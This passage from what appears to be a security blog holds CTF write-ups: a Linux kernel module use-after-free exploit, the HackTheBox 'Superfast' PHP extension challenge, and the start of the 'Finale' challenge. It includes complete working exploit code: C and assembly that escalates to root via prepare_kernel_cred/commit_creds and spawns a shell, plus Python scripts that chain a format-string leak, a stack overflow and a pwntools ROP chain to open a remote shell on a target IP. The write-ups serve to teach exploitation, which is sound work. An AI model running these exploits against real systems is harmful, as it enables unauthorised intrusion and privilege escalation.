     *     char *data = kmalloc(ku.len, GFP_KERNEL);
     *     knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
     *     knotes[ku.idx]->data = data;
     *     knotes[ku.idx]->len = len;
     *     if (copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) 
     *     {
     *         kfree(knotes[ku.idx]->data);
     *         kfree(knotes[ku.idx]);
     *         return -EFAULT;
     *     }
     *
     *      knotes[ku.idx]->encrypt_func = knote_encrypt;
     *      knotes[ku.idx]->decrypt_func = knote_decrypt;
     *
     * doesn't reset ku.idx upon fail, does 1 kmalloc
     * note: kmalloc(data) used to fill kfree(knote)
     */

    puts("[*] creating note 0: fail pls");
    cmd_send(KNOTE_CREATE, 0, (void*)0x1337, 32);
 
    set_ctx_reg();

    knote_t payload_knote;
    payload_knote.data = "idc3";
    payload_knote.len = 5;
    payload_knote.encrypt_func = &privesc_ctx_swp;
    payload_knote.decrypt_func = &privesc_ctx_swp;

    prepare_kernel_cred = 0xffffffff81053c50;
    commit_creds = 0xffffffff81053a30;

    printf("[*] new knote_t size: %lu\n", sizeof(knote_t));
    puts("[*] allocating malicious payload knote");
    cmd_send(KNOTE_CREATE, 1, &payload_knote, 32);
    
    // ...
}

The new code that triggers UAF

Then, we're triggering the function call to encrypt_func by using KNOTE_ENCRYPT:

#include 
#include 
#include 
#include 
#include 
#include 
#include "kpwn.c"


int FD_KNOTE;

enum knote_ioctl_cmd {
    // ...
};


typedef struct {
    // ...
} knote_user_t;


typedef struct {
    // ...
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
    // ...
}

void main()
{
    // ...
    
    /* case KNOTE_ENCRYPT:
     *     if (ku.idx >= 10 || !knotes[ku.idx]) 
     *     {
     *         mutex_unlock(&knote_ioctl_lock);
     *         return -EINVAL;
     *     }
     *     knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
     * 
     * trigger function call to encrypt_fun
     */
    puts("[*] calling (hopefully overwrited) encrypt function");
    cmd_send(KNOTE_ENCRYPT, 0, "idc4", 5);

    puts("[-] exploit failed :(");
}

The code triggering the exploit

Now, coming back to set_ctx_reg() and privesc_ctx_swp(). When we commit the code execution attack in the kmodule, we are in kernel space whilst we want to run a shell as root in userland. In order to get our beloved shell, we need to perform a context swap from kernel to userland. Such context swaps happen with every system call being made in the kernel so it's very important. In order to keep this write-up relatively short, you can read more about context swapping in the context swapping blogpost by geekculture.

Since these functions are very standard and used in most kernel pwn challenges I made it a header file:

long prepare_kernel_cred = 0xDEADC0D3;
long commit_creds = 0xDEADC0DE;
long _proc_cs, _proc_ss, _proc_rsp, _proc_rflags = 0;

void set_ctx_reg() {
    __asm__(".intel_syntax noprefix;"
            "mov _proc_cs, cs;"
            "mov _proc_ss, ss;"
            "mov _proc_rsp, rsp;"
            "pushf;" // push rflags
            "pop _proc_rflags;"
            ".att_syntax");

    printf("[+] CS: 0x%lx, SS: 0x%lx, RSP: 0x%lx, RFLAGS: 0x%lx\n", _proc_cs, _proc_ss, _proc_rsp, _proc_rflags);
}


void spawn_shell()
{
    puts("[+] Hello Userland!");
    int uid = getuid();
    if (uid == 0)
        printf("[+] UID: %d (root poggers)\n", uid);
    else {
        printf("[!] UID: %d (epic fail)\n", uid);
    }

    puts("[*] starting shell");
    system("/bin/sh");

    puts("[*] quitting exploit");
    exit(0); // avoid ugly segfault
}

void privesc_ctx_swp()
{
    __asm__(".intel_syntax noprefix;"
            /**
             * struct cred *prepare_kernel_cred(struct task_struct *daemon)
             * @daemon: A userspace daemon to be used as a reference
             *
             * If @daemon is supplied, then the security data will be derived from that;
             * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
             *
             * Returns the new credentials or NULL if out of memory.
             */
            "xor rdi, rdi;"
            "movabs rax, prepare_kernel_cred;"
            "call rax;" // prepare_kernel_cred(0)

            /**
             * int commit_creds(struct cred *new)
             * @new: The credentials to be assigned
             */
            "mov rdi, rax;" // RAX contains cred pointer
            "movabs rax, commit_creds;"
            "call rax;"

            // setup the context swapping
            "swapgs;" // swap GS to userland

            "mov r15, _proc_ss;"
            "push r15;"
            "mov r15, _proc_rsp;"
            "push r15;"
            "mov r15, _proc_rflags;"
            "push r15;"
            "mov r15, _proc_cs;"
            "push r15;"
            "lea r15, spawn_shell;" // lea rip, spawn_shell ; when returning to userland
            "push r15;"
            "iretq;" // swap context to userland
            ".att_syntax;");
}

Content of kpwn.c

Basically in a nutshell, the context swap requires the registers ss, rsp, rflags and cs from userland, since they are mission critical for returning to userland context. We store those registers in the set_ctx_reg() function:

long _proc_cs, _proc_ss, _proc_rsp, _proc_rflags = 0;

void set_ctx_reg() {
    __asm__(".intel_syntax noprefix;"
            "mov _proc_cs, cs;"
            "mov _proc_ss, ss;"
            "mov _proc_rsp, rsp;"
            "pushf;" // push rflags
            "pop _proc_rflags;"
            ".att_syntax");

    printf("[+] CS: 0x%lx, SS: 0x%lx, RSP: 0x%lx, RFLAGS: 0x%lx\n", _proc_cs, _proc_ss, _proc_rsp, _proc_rflags);
}

set_ctx_reg() content

After we set them, we can use our own privesc and context swap function which also sets the new userland execution pointer. Keep in mind that the following code snippet uses global variables in the assembly. The code starts off by calling prepare_kernel_cred(0) (which prepares the credentials to be set to UID 0 and GID 0) and then calls commit_creds(creds) to set the process credentials indefinitely. At last, it prepares the context swap registers and performs the context swap.

void privesc_ctx_swp()
{
    __asm__(".intel_syntax noprefix;"
            /**
             * struct cred *prepare_kernel_cred(struct task_struct *daemon)
             * @daemon: A userspace daemon to be used as a reference
             *
             * If @daemon is supplied, then the security data will be derived from that;
             * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
             *
             * Returns the new credentials or NULL if out of memory.
             */
            "xor rdi, rdi;"
            "movabs rax, prepare_kernel_cred;"
            "call rax;" // prepare_kernel_cred(0)

            /**
             * int commit_creds(struct cred *new)
             * @new: The credentials to be assigned
             */
            "mov rdi, rax;" // RAX contains cred pointer
            "movabs rax, commit_creds;"
            "call rax;"

            // setup the context swapping
            "swapgs;" // swap GS to userland

            "mov r15, _proc_ss;"
            "push r15;"
            "mov r15, _proc_rsp;"
            "push r15;"
            "mov r15, _proc_rflags;"
            "push r15;"
            "mov r15, _proc_cs;"
            "push r15;"
            "lea r15, spawn_shell;" // lea rip, spawn_shell ; when returning to userland
            "push r15;"
            "iretq;" // swap context to userland
            ".att_syntax;");
}

The privesc_ctx_swp() function

This sets the new RIP to spawn_shell, which contains our userland code to spawn a shell:

void spawn_shell()
{
    puts("[+] Hello Userland!");
    int uid = getuid();
    if (uid == 0)
        printf("[+] UID: %d (root poggers)\n", uid);
    else {
        printf("[!] UID: %d (epic fail)\n", uid);
    }

    puts("[*] starting shell");
    system("/bin/sh");

    puts("[*] quitting exploit");
    exit(0); // avoid ugly segfault
}

The spawn_shell() function which calls /bin/sh from userland

In our exploit we prepared the userland context registers, made a fake UAF knote object that would trigger privesc_ctx_swp, and set the addresses for the kernel functions prepare_kernel_cred and commit_creds.

    set_ctx_reg();

    knote_t payload_knote;
    payload_knote.data = "idc3";
    payload_knote.len = 5;
    payload_knote.encrypt_func = &privesc_ctx_swp;
    payload_knote.decrypt_func = &privesc_ctx_swp;

    prepare_kernel_cred = 0xffffffff81053c50;
    commit_creds = 0xffffffff81053a30;

    printf("[*] new knote_t size: %lu\n", sizeof(knote_t));
    puts("[*] allocating malicious payload knote");
    cmd_send(KNOTE_CREATE, 1, &payload_knote, 32);

A subsection of the exploit which sets the privesc up

Then, I tested the exploit locally by compiling it using compress.sh (given earlier in this post):

~ $ whoami
user
~ $ /exploit
exploit         exploit_easy    exploit_easy.c  exploit_real.c
~ $ /exploit_easy
[*] creating note 0: fail pls
ioctl(fd=3, cmd=0x1337, &ku=0x7fff3d3605c0) -> -1
[+] CS: 0x33, SS: 0x2b, RSP: 0x7fff3d3605e0, RFLAGS: 0x246
[*] new knote_t size: 32
[*] allocating malicious payload knote
ioctl(fd=3, cmd=0x1337, &ku=0x7fff3d3605c0) -> 0
[*] calling (hopefully overwrited) encrypt function
[+] Hello Userland!
[+] UID: 0 (root poggers)
[*] starting shell
/bin/sh: can't access tty; job control turned off
/home/user # whoami
root
/home/user #

Exploit proof-of-concept (PoC)

If you want to try the exploit yourself, here's the complete source code for exploit.c:

#include 
#include 
#include 
#include 
#include 
#include 
#include "kpwn.c"


int FD_KNOTE;

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};


typedef struct {
    unsigned long idx;
    char * data;
    size_t len;
} knote_user_t;


typedef struct {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
    knote_user_t user;
    user.idx = idx;
    user.data = data;
    user.len = len;

    int retv = ioctl(FD_KNOTE, cmd, &user);
    printf("ioctl(fd=%d, cmd=0x%x, &ku=%p) -> %d\n", FD_KNOTE, cmd, &user, retv);
}

void main()
{
    FD_KNOTE = open("/dev/knote", O_RDONLY);
    if (FD_KNOTE < 0)
    {
        puts("main(): open failed");
        exit(1);
    }

    /* case KNOTE_CREATE:
     *     char *data = kmalloc(ku.len, GFP_KERNEL);
     *     knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
     *     knotes[ku.idx]->data = data;
     *     knotes[ku.idx]->len = len;
     *     if (copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) 
     *     {
     *         kfree(knotes[ku.idx]->data);
     *         kfree(knotes[ku.idx]);
     *         return -EFAULT;
     *     }
     *
     *      knotes[ku.idx]->encrypt_func = knote_encrypt;
     *      knotes[ku.idx]->decrypt_func = knote_decrypt;
     *
     * doesn't reset ku.idx upon fail, does 1 kmalloc
     * note: kmalloc(data) used to fill kfree(knote)
     */

    puts("[*] creating note 0: fail pls");
    cmd_send(KNOTE_CREATE, 0, (void*)0x1337, 32);
 
    set_ctx_reg();

    knote_t payload_knote;
    payload_knote.data = "idc3";
    payload_knote.len = 5;
    payload_knote.encrypt_func = &privesc_ctx_swp;
    payload_knote.decrypt_func = &privesc_ctx_swp;

    prepare_kernel_cred = 0xffffffff81053c50;
    commit_creds = 0xffffffff81053a30;

    printf("[*] new knote_t size: %lu\n", sizeof(knote_t));
    puts("[*] allocating malicious payload knote");
    cmd_send(KNOTE_CREATE, 1, &payload_knote, 32);
    
    /* case KNOTE_ENCRYPT:
     *     if (ku.idx >= 10 || !knotes[ku.idx]) 
     *     {
     *         mutex_unlock(&knote_ioctl_lock);
     *         return -EINVAL;
     *     }
     *     knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
     * 
     * trigger function call to encrypt_fun
     */
    puts("[*] calling (hopefully overwrited) encrypt function");
    cmd_send(KNOTE_ENCRYPT, 0, "idc4", 5);

    puts("[-] exploit failed :(");
}

Complete exploit.c

Now it's time to perform the exploit on the remote machine. I wisely chose musl-gcc as the compiler in compress.sh since it decreases the size of static builds A LOT. The static binary sizes from gcc and musl-gcc are respectfully 800000 bytes and 34000 bytes. In order to transfer the exploit to the remote machine, I used encode.sh to encode the exploit binary, copy it to clipboard and decoded it using BASH utilities on the remote machine:

tar -czO $1 | base64 -w160


echo "\n\n===== TO DECODE =====" > /dev/stderr
echo "echo <...> | base64 -d | tar -xzO > exploit" > /dev/stderr

The encode.sh used to transfer files from local machine to the remote CTF box

$ encode.sh initramfs/exploit | xsel -b


===== TO DECODE =====
echo <...> | base64 -d | tar -xzO > exploit

Proof-of-concept of encode.sh to encode the binary

Afterword

I really hope you enjoyed the challenge and write-up as much as I did. Please let me know on Twitter if you want me to make a write-up about exploiting this CTF with real kernel primitives like seq_operations and setxattr.

If you like this pwn content, please checkout the HackTheBox - Blacksmith write-up, or checkout the Heap Memory and Linux Kernel tag pages on the site to read more kernel related blogposts.

Superfast (HackTheBox)

notselwyn — Mon, 28 Nov 2022 13:21:02 GMT

Hey folks. In this write-up, we're going to discuss the Superfast challenge in HackTheBox which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and perform a Return Oriented Programming (ROP) chain. The description of the challenge is:

We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we aquired from a temporarily exposed Git repository several months ago.Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?

I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.

Index

First looks
Finding primitives
Developing the ROP chain
Retrieving the flag

First looks

We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.

.
├── build_docker.sh
├── challenge
│   ├── index.php
│   ├── php_logger.so
│   └── start.sh
├── Dockerfile
└── src
    ├── build.sh
    ├── config.m4
    ├── php_logger.c
    └── php_logger.h

2 directories, 9 files

Directories given with the challenge

In /challenge/start.sh we can see that the challenge code gets bootstrapped using:

#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done

The content of start.sh

We can see that PHP loads php_logger.so as a binary extension for the webserver.

Finding primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.

Analysing index.php

The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.

 255) {
		http_response_code(400);
	} else {
		log_cmd($_GET['cmd'], $key);
	}
} else {
	http_response_code(400);
}

Content of index.php

One of the most important stages of exploit development is making a reproducing environment. Considering I want to run GDB on php_logger.so, I will run the challenge without Docker. I can run the PHP index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and I can send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123. We can see it succeeds because it returns a 200 status code.

[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing

Verbose output of the PHP webserver

Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.

Analyzing php_logger.so

We can find the source code of php_logger.so in /src/php_logger.c. Under which, we can find the source code of log_cmd() as well. We can see that log_cmd() retrieves function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and - if the return is valid - appends to the /tmp/log file.

PHP_FUNCTION(log_cmd) {
    char* input;
    zend_string* res;
    size_t size;
    long key;
    if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
        RETURN_NULL();
    }
    res = decrypt(input, size, (uint8_t)key);
    if (!res) {
        print_message("Invalid input provided\n");
    } else {
        FILE* f = fopen("/tmp/log", "a");
        fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
        fclose(f);
    }
    RETURN_NULL();
}

Source code of log_cmd()

This function does look safe, so the vulnerability is in decrypt(input, size, key). This function checks if the size of the command is less than the size of the stack buffer. If it is more it will return, but if it is less it will memcpy() and XOR the buffer with the key.

zend_string* decrypt(char* buf, size_t size, uint8_t key) {
    char buffer[64] = {0};
    if (sizeof(buffer) - size > 0) {
        memcpy(buffer, buf, size);
    } else {
        return NULL;
    }
    for (int i = 0; i < sizeof(buffer) - 1; i++) {
        buffer[i] ^= key;
    }
    return zend_string_init(buffer, strlen(buffer), 0);
}

Source code of decrypt()

We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int, we are using an unsigned value as a base value which means the value will wrap around. For example, in this case (uint)0 - (int)1 would become 2**32-1, instead of -1. A practical example would be the one below. The output of the program is 4294967295 1.

int main()
{
    unsigned int a = 5;
    int b = 6;

    printf("%u %d", a - b, a - b > 0);
}

Demo of interaction between (unsigned) integers

That means that sizeof(buffer) - size > 0) is always true, unless sizeof(buffer) == size. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.

Stack variable offsets in Ghidra

However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the smallest 12 bits of an address are not random, and thus can we reliably overwrite 12 bits of the return address. Say our normal return address would be 0x555555559a1e, in the next program, it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the smallest 12 bits.

The reason only the first 12 bits of the address don't change, is because they point to 4096 bytes (2 ** 12 bits), which is the page size. The kernel - the manager of ASLR - can't work with addresses smaller than 4096 bytes.

Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.

In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is equal 0x1014129. This means our scope of possible return addresses ranges from 0x1014100 to 0x10141ff.

      0010141e 48 89 ce     MOV       param_2,RCX
      00101421 48 89 c7     MOV       param_1,RAX
      00101424 e8 07 fc     CALL      decrypt
               ff ff
      00101429 48 89 44     MOV       qword ptr [RSP + local_10],RAX
               24 38
      0010142e 48 83 7c     CMP       qword ptr [RSP + local_10],0x0
               24 38 00

The code in our return scope is the following. We can see that decrypt() is called, print_message() is called and a bunch of file IO functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.

    *(undefined4 *)(param_2 + 8) = 1;
  }
  else {
    iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen);
    local_10 = CONCAT44(extraout_var,iVar1);
    if (local_10 == 0) {
      print_message("Invalid input provided\n");
    }
    else {
      local_18 = fopen("/tmp/log","a");
      fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18);
      fclose(local_18);
    }
    *(undefined4 *)(param_2 + 8) = 1;
  }
  return;
}

C decompilation of our return scope

However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.

      00101385 48 8b 84     MOV       RAX,qword ptr [RSP + local_18]
               24 a0 00 
               00 00
      0010138d 48 89 c6     MOV       inputlen,RAX
      00101390 48 89 cf     MOV       input,param_4
      00101393 e8 e8 fc     CALL      ::memcpy
               ff ff
      00101398 48 8b 54     MOV       key,qword ptr [RSP + local_58]
               24 60

Assembly code which moves the input into the RDI register

When I try to fuzz using a script, I receive the following output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~

Fuzzing output

from pwn import xor
import requests

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

# offset = 152 
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))

Script used to fuzz

However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.

from pwn import xor, gdb, u64
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5)

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00'))))

time.sleep(999)

Script for debugging using GDB

Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:

php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480

Output of the script

#!/usr/bin/env python3

from pwn import xor, u64, gdb
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')

time.sleep(3)

xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url)

content = s.get(url, headers=headers).content
addresses = content.split(b"_")

php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack))

time.sleep(999)

Payload for leaking addresses

We have the needed primitives, so we can develop the ROP chain.

Developing the ROP chain

Now we can use pwntools' ELF classes in order to make automatic ROP-chains. Using pwntools' ELF class we can see that the execl function in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:

Leaking the address of the PHP binary and the php_logger.so in memory.
dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable

We can generate a ROP chain automatically with pwntools:

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

Python code for generating the ROP chain

Which gives the following ROP chain:

0x0000:   0x56244b60816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x56244b6043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x56244b601be0 dup2
0x0028:   0x56244b60816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x56244b6043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x56244b601be0 dup2
0x0050:   0x56244b60816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x56244b6043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x56244b601be0 dup2
0x0078:   0x56244b60816b pop rdi; ret
0x0080:   0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088:   0x56244b60487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x56244b6043fc pop rsi; ret
0x00a0:   0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8:   0x56244b6042d0 execl

ROP chain generated by pwntools

As we can see, it does the following:

dup(4, 0)
dup(4, 1)
dup(4, 2)
execl("/bin/sh", "/bin/sh", 0)

C representation of the ROP chain

Retrieving the flag

I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.

#!/usr/bin/env python3

from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib

#gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5)

target_ip = b"161.35.173.232"
target_port = b"31302"

target_host = b"http://" + target_ip + b":" + target_port

s = requests.session()
headers = {"cmd-key": "1"}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40"

print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_")

print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals

php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack))

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n"

print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive()

time.sleep(999)

Python script for retrieving the flag

$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000:   0x55da3d00816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x55da3d0043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x55da3d001be0 dup2
0x0028:   0x55da3d00816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x55da3d0043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x55da3d001be0 dup2
0x0050:   0x55da3d00816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x55da3d0043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x55da3d001be0 dup2
0x0078:   0x55da3d00816b pop rdi; ret
0x0080:   0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088:   0x55da3d00487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x55da3d0043fc pop rsi; ret
0x00a0:   0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8:   0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf

Output of the exploit

Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.

Finale (HackTheBox)

notselwyn — Sat, 26 Nov 2022 18:27:03 GMT

Hey all. Today we're going to discuss the retired Finale challenge on HackTheBox. The description on HackTheBox is as follows:

It's the end of the season and we all know that the Spooktober Spirit will grant a souvenir to everyone and make their wish come true! Wish you the best for the upcoming year!

In this write-up, we will learn about the stack, ROP chains, and prioritizing attack vectors.

Spoiler alert: if you can't find the libc version, it's not a bug.

Summary

First looks
Finding vulnerability primitives
Developing the ROP chain
Retrieving the flag
Failed attempt

First looks

We are given an executable binary called finale. Upon performing a dynamic analysis, we are prompted for a password which means that we'll need to do a static analysis in order to proceed.

[Strange man in mask screams some nonsense]: iut2rxgf

[Strange man in mask]: In order to proceed, tell us the secret phrase: <...>

[Strange man in mask]: Sorry, you are not allowed to enter here!

The dynamic analysis

Running pwntools' checksec on finale gives us:

$ checksec finale
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Checksec output

The fields mean:

Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
RELRO: Relocation Read-Only - secures the dynamic linking process
Stack Canaries: protects against stack buffer overflow attacks
NX: No eXecute - write-able memory cannot be executed
PIE: Position Independable Executable - address randomization

For a more in-depth conclusion about checksec, please visit our previous blogpost about the Blacksmith challenge on Hack The Box. The logical conclusion is that we need to perform a stack-based buffer overflow (since Stack Canaries are disabled) leading to a Return-Oriented-Programming chain (since NX is enabled).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact.

Main() analysis

In order to analyze the binary, I opened it up in Ghidra, made by the NSA. The main() function prints 8 random bytes, asks us for a secret and calls finale().

long main()
{
  int iVar1;
  char secret [16];
  char rand [8];
  ulong i;
  
  banner();
  rand = 0;
  iVar1 = open("/dev/urandom",0);
  read(iVar1,rand,8);
  printf("\n[Strange man in mask screams some nonsense]: %s\n\n",rand);
  close(iVar1);
  secret._0_8_ = 0;
  secret._8_8_ = 0;
  printf("[Strange man in mask]: In order to proceed, tell us the secret phrase: ");
  __isoc99_scanf("%16s",secret);
  i = 0;
  do {
    if (i > 14) {
LAB_CHECK_SECRET:
      iVar1 = strncmp(secret,"s34s0nf1n4l3b00",15);
      if (iVar1 == 0) {
        finale();
      } else {
